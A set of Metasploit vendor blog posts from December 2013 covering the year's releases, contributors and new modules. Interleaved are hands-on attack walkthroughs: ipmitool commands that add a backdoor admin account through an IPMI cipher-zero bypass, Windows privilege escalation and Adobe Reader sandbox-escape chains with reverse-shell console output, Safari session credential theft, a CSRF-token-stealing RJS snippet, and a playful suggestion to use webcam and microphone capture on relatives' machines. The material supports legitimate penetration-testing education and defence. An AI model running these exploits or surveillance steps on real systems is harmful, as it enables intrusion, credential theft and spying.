Skip navigation
All Places > Metasploit > Blog > 2013 > December

This post is the seventh in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.


Today is the last day of the year, so there's no better time to get all weepy and sentimental about Metasploit development over a glass or four of champagne. I continue to be amazed, honored, and humbled by the amount of talent, skill, and brute force labor that goes in to keeping the Metasploit juggernaut rolling. With that, here's a quick stat check of what we've been up to.

Major Releases

We successfully published three major releases of Metasploit over the course of the year. April saw the release of Metasploit 4.6, which solidified full integration with the Kali Linux distribution as well as coverage for the OWASP 10 (2013 edition). In July, we released Metasploit 4.7, which introduced firewall egress testing and the automation oomph introduced by Metasploit Pro's MetaModules. In November, we published Metasploit 4.8 which boasts much better integration with Nexpose (Rapid7's delightful vulnerability scanner) for vulnerability validation capabilities.


New Content

Coincidentally, we ended the year in 2012 with exactly 2012 modules, across exploits, auxiliary and post modules, and payloads. We're ending 2013 with 2448 modules; that's just about 1.2 modules a day, every day. Major target categories that got attention were client-side browser and file format exploits (made easier now with the new BrowserExploitServer mixin), a bunch of new cross-platform web application server-side exploits, and of course the SAP modules that we've been yammering about since October. We also now have a huge trove of new SOHO router scanners and exploits, which are themselves a subset of our newly extended ARM and MIPS embedded device target support which Juan talked about yesterday.


More Meterpreters

OJ talked at length earlier this HaXmas about the Windows Meterpreter overhaul, but did you know that we've made significant advances with Java Meterpreter and landed the brand new and most excellent Python Meterpreter? Yep, and the Android Meterpreter is still coming along, too. It's been a great year all around for Metasploit payloads -- we have over 100 payloads new to 2013, so if you haven't peeked in on those lately, now's a fine time to catch up.


More Contributors

Finally, but most importantly, we've had some amazing support from the open source security community over 2013. We've had 204 committers over the year to Metasploit, more than any other year. The depth of talent, drive, and commitment among these committers really and truly does astound me every day. Y'all are the reason why Metasploit is where it is today.


The top 25 commiters (according to git logs) are:


Name/AliasCommit Count
Spencer McIntyre47
Andras Kabai34


And here are all the names and aliases of people who are credited with at least one commit this year: Jeff Jarmoc, Joe Vennix, g0tmi1k, Karn Ganeshen, scriptjunkie, Peter Toth, Nathan Einwechter, Matt Andreko, Doug P, root, agix, Ramon de C Valle, Console, Bruno Morisson, Charlie Eriksen, bwall, bcoles, shuckins-r7, schierlm, modpr0be, Markus Wulftange, xistence, smilingraccoon, Dejan Lukan, lsanchez-r7, rsmudge, Joshua J. Drake, Mekanismen, ChrisJohnRiley, Rick Flores (nanotechz9l)  12, SphaZ, Roberto Soares Espreto, bmerinofe, MrXors, timwr, Kacper Nowak, Thomas Hibbert, zeknox, AverageSecurityGuy, shellster, darknight007, Brandon Perry, lmercer, Ruslaideemin, KarnGaneshen, Geyslan G. Bem, dummys, jvennix-r7, kaospunk, Brian Wallace, SeawolfRN, Joshua Abraham, J.Townsend, Josh, doug, Robin Wood, dcbz, h0ng10, corelanc0d3r, Matteo Cantoni, salcho, f8lerror, TecR0c, Borja Merino, Jonathan Claudius, Boris, Sven Vetsch / Disenchant, sgabe, jonvalt, heyder, Joshua Harper, xard4s, Rich Lundeen, Brandon McCann, Ricardo Almeida, dougsko, Thomas McCarthy, Cristiano Maruti, John Sherwood, DoI, joernchen of Phenoelit, jamcut, Jon Hart, Alexandre Maloteaux, William Vu, jgor, Tod Beardsley, Davy Douhine, Shelby Spencer, ddouhine, Jonathan, Enrique A. Sanchez Montellano, Stephen Haywood, Charles Smith, trustedsec, ZeroChaos, Dhiru Kholia, Sean Verity, Daniele Martini, Patrick Webster, Thomas Ring, booboule, Tabassassin, Brandon Knight, T0X1C-1, Wolfgang Ettlinger, Frederic Basse, Ryan Wincey, CG, Jose Selvi, Nicholas Davis, joe, Trevor Rosen, Norbert Szetei, rbsec, Fernando Arias, Tyler Krpata, nemski, Henrik Kentsson, Joe Barrett, pyoor, Jonathan Rudenberg, Booboule, Trenton Ivey, Winterspite, ethicalhack3r, Alexia Cole, Rick Flores, Gerry Eisenhaur, Joe Rozner, Paul, MosDefAssassin, Till Maas, Geyslan Gregorio Bem, tkrpata, Vlatko Kosturjak, violet, Juushya, Icewall, Joff Thyer, yehualiu, Sagi Shahar, allfro, rogueclown, danielemartini, Artien Bel, Doug Prostko, Joshua Harper PI GCFE GCFA, Darren Martyn, Newpid0, Thorsten Fischer, Russell Sim, matthiaskaiser, zyx2k, TrustedSec, Matthias Kaiser, Joel Parish, julianvilas, jwpari, cbgabriel, Garret Picchioni, steponequit, Melih SARICA, Julian Vilas, Antoine, LinuxGeek247, ringt, farias-r7, bannedit, Nick Rivera, Stephen Fewer, Bouke van der Bijl, Gregory Man, TabAssassin, Sam Gaudet, luh2, Gary Spillman, Tonimir Kisasondi


Oh, that's some sweet, sweet SEO right there. Thanks to every single one of you for your contribution of your time and expertise to the Framework!


New Modules

Oh, and hey, we released the final Metasploit update for the year just now, too -- 13 new modules this week, including the veristle intelligence-gathering DNS scraper module from zeknox and an exploit for Red Hat CloudForms from Ramon. Thanks guys!


Exploit modules


Auxiliary and post modules


If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.


This year, infosec superstars Dan Farmer and HD Moore have been making an impressive effort to spread the warnings around the Baseboard Management Controllers (BMCs), used to provide remote management capabilities for servers and installed in nearly all servers manufactured today, and the Intelligent Platform Management Interface (IPMI), the server management protocol running on the BMC. Dan Farmer published a paper on IPMI and BMC security, disclosing several issues found while reviewing the security of the IPMI network protocol that uses UDP port 623. HD put together a set of methods and Metasploit modules available to exploit various of the issues with IPMI. The issues allow IPMI anonymous authentication due to default credentials, retrieve password hashes, and bypass authentication on IPMI 2.0 with the use of cipher type 0.

Let me remind you how to exploit the "Cipher 0" issue because it is nifty! You can just use the ipmi_cipher_zero module to identify systems that have cipher 0 enabled:

$ msfconsole
       =[ metasploit v4.7.0-dev [core:4.7 api:1.0]
+ -- --=[ 1119 exploits - 638 auxiliary - 179 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
msf> use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS
msf auxiliary(ipmi_cipher_zero) > run
[*] Sending IPMI requests to> (256 hosts)
[+] VULNERABLE: Accepted a session open request for cipher zero
[+] VULNERABLE: Accepted a session open request for cipher zero
[+] VULNERABLE: Accepted a session open request for cipher zero
[+] VULNERABLE: Accepted a session open request for cipher zero

And then use the standard "ipmitool" command-line interface and a valid username to create a backdoor account:

$ ipmitool -I lanplus -H -U Administrator -P FluffyWabbit user list
Error: Unable to establish IPMI v2 / RMCP+ session
Get User Access command failed (channel 14, user 1)
$ ipmitool -I lanplus -C 0 -H -U Administrator -P FluffyWabbit user list
ID  Name         Callin  Link Auth    IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   (Empty User)     true    false      false      NO ACCESS
$ ipmitool -I lanplus -C 0 -H -U Administrator -P FluffyWabbit user set name 2 hdm
$ ipmitool -I lanplus -C 0 -H -U Administrator -P FluffyWabbit user set password 2 password
$ ipmitool -I lanplus -C 0 -H -U Administrator -P FluffyWabbit user priv 2 4
$ ipmitool -I lanplus -C 0 -H -U Administrator -P FluffyWabbit user enable 2
$ ipmitool -I lanplus -C 0 -H -U Administrator -P FluffyWabbit user list
ID  Name         Callin  Link Auth    IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   hdm              true    false      true       ADMINISTRATOR
$ ssh hdm@
hdm@'s password: password
User:hdm logged-in to ILOMXQ3469216(
iLO 4 Advanced Evaluation 1.13 at  Nov 08 2012
Server Name: host is unnamed
Server Power: On


Simple and powerful! Remember, at the time of release Dan and HD found 53,000 IPMI 2.0 systems vulnerable to password bypass due to Cipher 0. If you haven't done so already, you might consider starting the year reviewing the FAQ about the BMC and IPMI research, Dan's paper, and HD Moore's penetration tester's guide!!


Not having enough with this research, later this same year HD Moore published the results of a security analysis on the Supermicro IPMI firmware, used in the baseboard management controller (BMC) of many Supermicro motherboards. In this analysis HD found usage of static encryption keys, hardcoded credentials, and several issues on the web management interface, including overflows, of course!


Exploiting memory corruption on these ARM-based embedded devices is really a challenging exercise which includes emulation, live exploitation, and keeping a lot of assembly in your head! If you would like to dig into the details, we published a journey into the exploiting too!


All in all, an impressive body of research which is worth to check carefully. In the meantime, I'm pretty sure these heavyweights will be working on more and awesome stuff... can't wait until see what 2014 offers the security community!

This post is the fifth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.

Several weeks ago, Egor Homakov wrote a blog post pointing out a common info leak vulnerability in many Rails apps that utilize Remote JavaScript. The attack vector and implications can be hard to wrap your head around, so in this post I'll explain how the vulnerability occurs and how to exploit it.

What is Remote Javascript?

Remote JavaScript (RJS) was a pattern prescribed by Rails < 2 to implement dynamic web sites. In RJS the user-facing parts of a website (HTML and JS) act as a "dumb client" for the server: when dynamic action is needed, the client calls a JavaScript helper that sends a request to the server. The server then performs the necessary logic and generates and responds with JavaScript code, which is sent back to the client and eval()'d.

The RJS approach has some advantages, as rails creator dhh points out in a recent blog post. However, suffice it to say that RJS breaks down as soon as you need complex client-side code, and a server API that responds with UI-dependent JavaScript is not very reusable. So Rails mostly has moved away from the RJS approach (JSON APIs and client-heavy stacks are the new direction), but still supports RJS out of the box.

So what's the problem?

Unfortunately, RJS is insecure by default. Imagine a developer on a Rails app that uses RJS is asked to make an Ajax-based login pop-up page. Following the RJS pattern, the developer would write some JavaScript that, when the "Login" link is clicked, asks the remote server what to do. The developer would add a controller action to the Rails app that responds with the JavaScript required to show the login form:

class Dashboard
  def login_form
    respond_to do |format|
      format.js do
        render :partial => 'show_login_form'

Following the RJS pattern, the show_login_form.js.erb partial returns some JavaScript code to update the login form container:

$("#login").show().html("<%= escape_javascript(render :partial => 'login/form')")

Which, when rendered, produces code such as:

  <form action='/login' method='POST'
  <input type='hidden' name='auth_token' value='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'>
          <td><input type='text'></td>
          <td><input type='password'></td>

Now imagine user Tom is logged into the Rails app (which we'll say is served from An unrelated website might serve Tom the following code:

    <script src=''></script>

Because <script> tags are allowed to be cross-origin (this is useful for CDNs), Tom's browser happily sends a GET request to, attaching his cookie. The RJS script is generated and returned to Tom, and his browser executes it. By stubbing out the necessary functions in the global scope, can easily gain access to the string of HTML that is sent back:

      function $() {
        return {
          show: function() {
            return {
              html: function(str) {
    <script src=''></script>

And now can easily parse out Tom's CSRF auth token and start issuing malicious CSRF requests to This means that can submit any form in The same technique can be used to leak other information besides auth token, including logged-in status, account name, etc.

As a pentester, how can I spot this bug while auditing a web app?

It is pretty easy to find this vulnerability. Click around a while in the web app and keep Web Inspector's Network tab open. Look for .js requests sent sometime after a page load. Any response to a .js request that includes private info (auth token, user ID, existence of a login session) can be "hijacked" using an exploit similar to the above PoC.

How can I fix this in my web app?

The fix prescribed by Rails is to go through your code and add request.xhr? checks to every controller action that uses RJS. This is annoying, and is a big pain if you have a large existing code base that needs patching. Since Metasploit Pro was affected by the vulnerability, we needed a patch quick. So I present our solution to the vulnerability - we now check all .js requests to ensure that the REFERER header is present and correct. The only downside here is that your app will break for users behind proxies that strip referers. Additionally, this patch will not work for you if you plan on serving cross-domain JavaScript (e.g. for a hosted JavaScript SDK). If you can stomach that sacrifice, here is a Rails initializer that fixes the security hole. Drop it in ui/config/initializers of your Rails app:

# This patch adds a before_filter to all controllers that prevents xdomain
# .js requests from being rendered successfully.

module RemoteJavascriptRefererCheck
  extend ActiveSupport::Concern

  included do
    require 'uri'
    before_filter :check_rjs_referer, :if => ->(controller) { controller.request.format.js? }

  # prevent generated rjs scripts from being exfiltrated by remote sites
  # see
  def check_rjs_referer
    referer_uri = begin
    rescue URI::InvalidURIError

    # if request comes from a cross domain document
    if referer_uri.blank? or
      ( and != or
      (request.port.present? and referer_uri.port != request.port)

      head :unauthorized

# shove the check into the base controller so it gets hit on every route
ApplicationController.class_eval do
  include RemoteJavascriptRefererCheck

And your server will now return a 500 error to any RJS request that does not contain the correct REFERER. A gist is available here, just download and place in $RAILS_ROOT/config/initializers.

This post is the fourth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.

Every year during a major holiday, we crawl out from our own bat cave and actually spend time with our family and friends. People start asking you what you do for a living? You respond with something you probably regret like "I am a penetration tester.", because to an average person your job title probably sounds no different than a porn star, or that you can start a fire with your thoughts. After some clarification, they kind of grasp of what you do - apparently you do something magical with them computers. And then the inevitable happens: Your ma and pa, brothers and sisters, your uncle, and even the neighbor come to you and ask you to fix their computers, maybe do a demonstration like blowing up a computer like the movie "Live Free or Die Hard" they just saw.


Let's face it, you are your family computer wizard, and it's time to put your skills into "good use" like fixing their computers, and get them educated about the risks of accepting candy from strangers on the Internet. If you're a little overwhelmed, fear no more, because with Metasploit in hand you can do ANYTHING... well, almost anything. Here's a few common tricks that we actually find practical during a family reunion:


Lost File, Please Recover!


Metasploit has two extremely handy data recovery tools you can use. The first one is post/windows/gather/forensics/recovery_files.rb, brought to you by Borja Merino. The other is post/windows/gather/forensics/imager.rb, by Wesley McGrew.


The recovery_files module basically tries to recover files that got recently deleted. Borja already made a video while making the module, so we'll let the video do the talking:


Screen Shot 2013-12-25 at 2.49.15 PM.png


The imager module functions a little bit like the dd command in Unix, except this is for Windows due to the use of Windows API (railgun). It will perform a byte-for-byte imaging of remote disks and volumes. Byte-for-byte obviously can be a time consuming task, so we advice leaving this option last.


What's the wireless password again?


Say everybody comes home for the holiday, and they've brought in all kinds of gadgets (XBOX One, Kindle Reader, laptops, smart phones, etc). Hey ma, what's the Wifi password? Your parents might not actually know the answer to that, and they blame the technician who set up the network months ago... or was it years ago? Your mission: to find the wifi password.


You can most likely do this by physically connecting to the wireless router and reset the password that way. Or on your parent's laptop, you can try the post/windows/wlan/wlan_profile post module to see if you can extract the passphrase from the keyMaterial element in the wifi profile.


Forgotten Administrator Password?


Sometimes it's almost impossible for a regular human being to not forget a password, like your family. The most common way is to reset it locally, often probably with a bootable disk (depends on the system). However, it is also possible to simply escalate privileges with whatever user account you have, and go from there. The most basic way is by using the "getsystem" command in meterpreter. If that doesn't work, you can try to pick a local exploit module like ppr_flatten_rec:


msf exploit(handler) > run

[*] Started reverse handler on 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to
[*] Meterpreter session 2 opened ( -> at 2013-12-25 16:30:04 -0600

meterpreter > getuid
Server username: WIN-6NH0Q8CJQVM\sinn3r
meterpreter > background
[*] Backgrounding session 2...

msf exploit(handler) > use exploit/windows/local/ppr_flatten_rec 

msf exploit(ppr_flatten_rec) > set session 2
session => 2
msf exploit(ppr_flatten_rec) > run

[*] Started reverse handler on 
[*] Launching notepad to host the exploit...
[+] Process 3784 launched.
[*] Reflectively injecting the exploit DLL into 3784...
[*] Injecting exploit into 3784 ...
[*] Exploit injected. Injecting payload into 3784...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 10 sec ...
[*] Sending stage (769024 bytes) to
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 3 opened ( -> at 2013-12-25 16:31:32 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


If you actually managed to escalate privileges, do them a favor and run a system update too while you're at it :-)



Hollywood Hacking for Entertainment


We haven't figured out how to remotely blow up a computer, but here's a few modules that make hacking easy to understand and fun. Surprisingly, kids love playing with these :


Screen Shot 2013-12-25 at 3.07.00 PM.png

Webcam manipulation


Controlling webcam is pretty much a standard in Hollywood hacking, and you can do that with Metasploit too. Modules such as post/windows/manage/webcam or post/osx/manage/webcam; or the webcam_snap meterpreter command are great for this . It's not as awesome as Chatroulette like the one to the left though :-)


Microphone manipulation


Metasploit is also capable of audio recording. You can use the post/osx/manage/record_mic module, or post/multi/manage/record_mic.


Video Broadcasting


And of course, who can pass on the opportunity of rickrolling everybody on a holiday?


There are also plenty of Metasploit modules you can use for entertainment purposes, we encourage all of you to browser around our post module directory tree. But if you don't see anything you like, you can always file a feature request on Redmine and let us know. Or please feel free to submit your own :-)


As always, remember to run that msfupdate command to make sure you are up to date with Metasploit. For those of you who are new to Metasploit, you can download a copy here, and may the force be with you.

This post is the third in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.


Over the last quarter of 2013, we here in the Democratic Freehold of Metasploit found that we needed to modernize our flagship remote access toolkit (RAT), Meterpreter. That started with cleaving Meterpreter out of the main Metasploit repository and setting it up with its own repository, and then bringing in a dedicated Meterpreter hacker, the indomitable OJ TheColonial Reeves. We couldn't be happier with the results so far.


OJ has kindly written up an extensive report of what all he's worked on with Meterpreter and post-exploitation on Windows hosts over on his blog. I encourage you to head on over there and read his 3 Months of Meterpreter. For bullet points, the TL;DR is:


  • A Sane Build Environment

The biggest complaint we used to get about Meterpreter is the pain and suffering one had to go through just to build the darn thing. OJ has reworked all that from soup to nuts, and now Meterpreter builds cleanly and easily using Microsoft Visual Studio Express. If this is your complaint as well, please take a look at the README and amaze at the single 'make' command to kick things off.


  • Rock Solid Stability

Sometimes, Meterpreter would crash out on the target, often for mysterious reasons. No longer! OJ tackled pretty much all of the outstanding bugs having to do with Meterpreter stability, and it's better than ever now.



  • Securification

Metasploit bread-and-butter exploits tend to be classic stack buffer overflows... so after a code audit, we've patched up all the obvious paths to remote code execution with Meterpreter. While we haven't proven exploitability with the old Meterpreter, we're pretty confident today that you won't get your sessions jacked out from under you by a rival pen-tester. Note, if you're able to successfully subvert a Meterpreter installation, we'd sure appreciate a Metasploit module proving it...


  • Enhanced Local Exploits

We've moved the KiTrap0D exploit out of the path for 'getsystem', and promoted it to a proper local exploit for privilege escalation; this has the result of making 'getsystem' procedures a lot more stable in the usual cases, leaving it to the penetration tester to decide if she wants to explore additional avenues of escalating to system privileges. Thanks to the submodule-ing of Stephen Fewer's ReflectiveDLLInjection strategy, we've also refactored the ppr_flatten_rec exploit to be a lot more reliable, as well.


  • Bunches of New Features

Along the way with making existing Meterpreter functionality more reliable and easier to use, we've added two heaping handfuls of new functionality; better IPv6 support, refreshed Incognito and mimikatz implementations, more robust environment variable enumeration, a new "Extended API" extension (which incidentally provides a nice roadmap on how to write Meterpreter extensions in general), a framework for interrogating ADSI, and so much more.


  • Readable Documentation

Finally, Meterpreter ships with inline, automatically generated documentation using Doxygen, a pretty standard syntax for annotation-based docs. Since you can easily generate the latest docs locally, you no longer have to rely on (or get mislead by) outdated API docs when hacking on Meterpreter.


Again, there's tons of details on all this in OJ's post, so if this kind of thing excites you, feel free to roll up your sleeves and dive into Meterpreter's guts. Payload integration in general is kind of what puts the "meta" in Metasploit -- having all this available to exploit developers and penetration testers should make security R&D move long much faster and cleaner, and get you from proof-of-concept to functional shells in real world situations with less time and effort.


Happy haXmas!

This post is the second in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.

If you are reading this blog post, I reckon you are somewhat a geeky security person, and you use some sort of application like KeyPass, Keychain, LastPass, etc, to manage your passwords. After all, we all know too well password stealing is a major security issue, and sometimes this is more than enough to get you to all kinds of wonderful places like the domain controller, the CEO's laptop, and all the goodies along the way. It also makes my heart die a little (in a good way, I guess?) when I hear professional penetration testers compromising the entire network by just stealing passwords, reuse or pass-the-hash and all that, while we spend intense amount of time building awesome exploits that they don't actually have to use. I mean, come on, man! :-) But of course, Metasploit creates more than just exploits, it covers the whole offensive package, so password stealing is definitely always on the menu.


Recently, I came across an article from SecureList about the discovery of Apple Safari storing session states un-encrypted. The "ah-ha, jackpot!" moment kicked in because stuff like this is such an easy win, and I decided to take a look. The problem is simple: So Apple Safari has this feature that allows you to reopen all the windows from last session with a click on a button, and the magic behind that is by storing these session states in a file named LastSession.plist. This is a binary property list that can be manually converted into a more human readable format by using the built-in plutil command in OS X, and then your session data can be found encoded in Base64. And you don't really have to be a computer genius to decode this, there are tools available online, just let me google that for ya.


And yes, I also just described how to write that module. I have been told the best crackers in the world can write this under 60 minutes, but fortunately I've already written it for you, so you can steal this under 60 seconds. Woohoo!


Another eye-candy thing is the researcher of the discovery (Mr. Vyacheslav Zakorzhevsky) demonstrated stealing a Gmail credential with the flaw, his screenshot is this:


Look closely, and you'll see words like "Email=kaspersky_login&Passwd=kaspersky_passwd", "application/x-www-form-urlencoded", ""... yeah, those are quite lovely. In case you're curious where this data is from, you can simply find it in Google's login form, specifically at, I hope you like HTML:


Screen Shot 2013-12-25 at 12.44.12 AM.png


To trigger Safari storing your session data, here's an example of how to do that safely in case you want to test it yourself:


  1. Go to
  2. Enter an invalid username and password, click "Sign In"
  3. Google should tell you the credential is bad, now press refresh.


And now that session state should be stored in ~/Library/Safari/LastSession.plist. If you're lazy like me, you can just run Metasploit's post/osx/gather/safari_lastsession module:


Screen Shot 2013-12-25 at 12.39.08 AM.png


The above test was conducted against Apple Safari version 7.0.1 (9537.73.11) on OS X 10.9.1. Yes, it is the latest version of Safari. Yes, someone did say this was patched in Safari 6.1, except not really. We've already informed the appropriate party to verify this patch information, and I'm sure this will be resolved shortly. Meanwhile, if you are a Safari user, please do this:


  1. Open Safari
  2. On your top left corner, click on "Safari" -> "Preferences"
  3. Click on the "Privacy" tab, and you should see the following - I want you to click that "Remove All Website Data" button real hard and make sure your LastSession.plist is cleared:


Screen Shot 2013-12-25 at 2.23.35 AM.png


Last but not least, if you're still wondering if LastSession.plist is still storing some sensitive data, you can always run the Metasploit module and test it out yourself. Metasploit can be downloaded here if you're new to the game. If you are already a Metasploit user, please make sure to run the msfupdate and that baby will be yours.


Oh, and if you do actually extract some username/password, remember to clear your ~/.msf4/loot/ directory. Because the username/password (in plain text) will be stored there, too. The post module should tell you precisely where this file is.

This post is the first in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.


This year 2013 disclosure of a banking Trojan modified to look for SAP GUI installations has harisen. A concerning sign that SAP system hacking has gone into mainstream cybercrime.  Once a domain of a few isolated APT attacks, SAP appears to be in the crosshairs of hackers that know just how much sensitive data ERP systems house.  With more than 248,500 customers in 188 countries, SAP may see an increase of attacks and their customers face the threat of data theft, fraud and sabotage.


This trend is not really surprising, given that financial, customer, employee and production data reside in a company’s enterprise resource planning (ERP) systems—and they are juicy targets for all sorts of malicious hackers. What’s worse, these systems have often organically grown over decades and are so complex that few people understand their organization’s entire ecosystem, let alone some of SAP’s protocols and components that are not publicly documented. This year, we've made significant effort to make of Metasploit a better SAP pentesting platform, due in a large part to an awesome community we should thank again! (and again, and again...). Because of their awesome work, now there are more than 50 SAP related modules into the framework. So, if you meet some of these guys, stop them and say thank you!



Thanks to all of them, the most important SAP infrastructure components are now covered by Metasploit, including:


  • DIAG/RFC communications, with support for the nwrfc wrapper on the Q Metasploit Repository.
  • The SAP Router.
  • The SAP Management Console.
  • The SAP Internet Communication Manager and the SAP Internet Communication Framework.
  • The J2EE Engine.


Not only code has been added to Metasploit. All of these capabilities, and how to use them have been covered on a free research paper which you can download here: “SAP Penetration Testing Using Metasploit - How to Protect Sensitive ERP Data”. And we have published several webcasts where you can learn more about SAP exploitation with Metasploit from the authors:



So, there are no excuses to not take into account SAP infrastructures when planning the 2014's pentest engagements. The tools are out there!

Recently, FireEye identified and shared information about two vulnerabilities used in the wild to exploit Adobe Reader on Windows XP SP3 systems. The vulnerabilities are:


  • CVE-2013-3346: An Use After Free on Adobe Reader. Specifically in the handling of a ToolButton object, which can be exploited through document's Javascript. This vulnerability is used to get remote code execution through a malicious PDF document. The code will be executed in a renderer process, inside the Adobe Reader sandbox if available.
  • CVE-2013-5065: A out of bounds array access on the Windows kernel driver ndproxy.sys. This vulnerability allows to escape the Adobe Reader sandbox so execution of processes and persistence can be easily achieved. As has been already disclosed, remember which the Routing and Remote Access service must be enabled in the target so the NDProxy driver will be available.


Metasploit already has modules available for both vulnerabilities:



In this blog post we're going to explain how to chain both modules to accomplish Adobe Reader Sandbox bypass like in the wild.


  • First of all, a session from a Reader renderer process is needed. In order to get it, the file format or the browser version of the adobe_toolbutton exploit can be used. In this example, the browser version is used:


msf > use exploit/windows/browser/adobe_toolbutton
msf exploit(adobe_toolbutton) > set SRVHOST
msf exploit(adobe_toolbutton) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_toolbutton) > set LHOST
msf exploit(adobe_toolbutton) > exploit
[ ] Exploit running as background job.

[ ] Started reverse handler on 
[ ] Using URL:
[ ] Server started.
msf exploit(adobe_toolbutton) > [*]  adobe_toolbutton - Gathering target information.
[ ]  adobe_toolbutton - request: /vMrwTnexHFjnis/SZLfWc/
[ ]  adobe_toolbutton - Sending PDF...
[ ] Sending stage (769024 bytes) to
[ ] Meterpreter session 1 opened ( -> at 2013-12-17 16:10:55 -0600

msf exploit(adobe_toolbutton) > sessions -i 1
[ ] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 


  • With this session shouldn't be possible to execute a new process, neither migrate to an existent process, because the Reader sandbox will prevent:


meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps -S AcroRd32|cmd
Filtering on process name...

Process List

 PID   PPID  Name          Arch  Session     User                           Path
 ---   ----  ----          ----  -------     ----                           ----
 3304  3128  AcroRd32.exe        4294967295                                 
 3336  3304  AcroRd32.exe  x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3824  1452  cmd.exe             4294967295                                 

meterpreter > migrate 3824
[*] Migrating from 3336 to 3824...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)


  • Here is where the ms_ndproxy local exploit comes to the rescue. Use it with the current session. Remember which the target process, at the moment, is inside the sandbox, so the exploit will elevate the current one (you can not execute a new process).


meterpreter > background
[*] Backgrounding session 1...
msf exploit(adobe_toolbutton) > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > set SESSION 1
msf exploit(ms_ndproxy) > exploit

[*] Started reverse handler on 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[!] Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...


  • So even when there isn't new session in this case, the original should belong to SYSTEM if the exploit has been successful:


msf exploit(ms_ndproxy) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 


  • Even when we're still inside a sandboxed process, now we should available to migrate, and finally execute new processes:


meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps -S AcroRd32|cmd
Filtering on process name...

Process List

 PID   PPID  Name          Arch  Session  User                           Path
 ---   ----  ----          ----  -------  ----                           ----
 3304  3128  AcroRd32.exe  x86   0        JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3336  3304  AcroRd32.exe  x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3824  1452  cmd.exe       x86   0        JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\cmd.exe

meterpreter > migrate 3824
[*] Migrating from 3336 to 3824...
[*] Migration completed successfully.
meterpreter > execute -f c:\\windows\\system32\\calc.exe
Process 2372 created.
meterpreter > ps -S calc
Filtering on process name...

Process List

 PID   PPID  Name      Arch  Session  User                           Path
 ---   ----  ----      ----  -------  ----                           ----
 2372  3824  calc.exe  x86   0        JUAN-C0DE875735\Administrator  c:\windows\system32\calc.exe

meterpreter > 



Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments

New Adobe Reader ROP Gadgets

This week, Juan Vazquez put together a neat one-two exploit punch that involves a somewhat recent Adobe Reader vulnerability (disclosed back in mid-May) and a sandbox escape via a OS privilege escalation bug. I won't give away the surprise there -- he'll have a blog post about it up in a few hours.  Part of the work, though, resulted in some new entries in Metasploit's RopDB; specifically, for Adobe Reader versions 9, 10, and 11.


If you're not already familiar with the RopDB that ships with Metasploit, you can brush up by reading Wei @_sinn3r Chen's write up about ROP chaining from way back in October, 2012, then follow up with his 2013 refresh.  Hopefully, these chains prove to be useful for exploit developers for a while, which should make turnaround for future (and recent past) Reader vulnerabilities quicker and easier.


YouTube Broadcasting

We have a fun module this week just in time for Xmas from Wei @_sinn3r Chen, the multi-platform YouTube broadcaster. To use it, simply point to a YouTube video ID (for example, XAg5KjnAhuU), fire it off on your compromised clients (Windows, Linux, or Mac), and amaze at the full-screen display of the video on your target's active desktops.


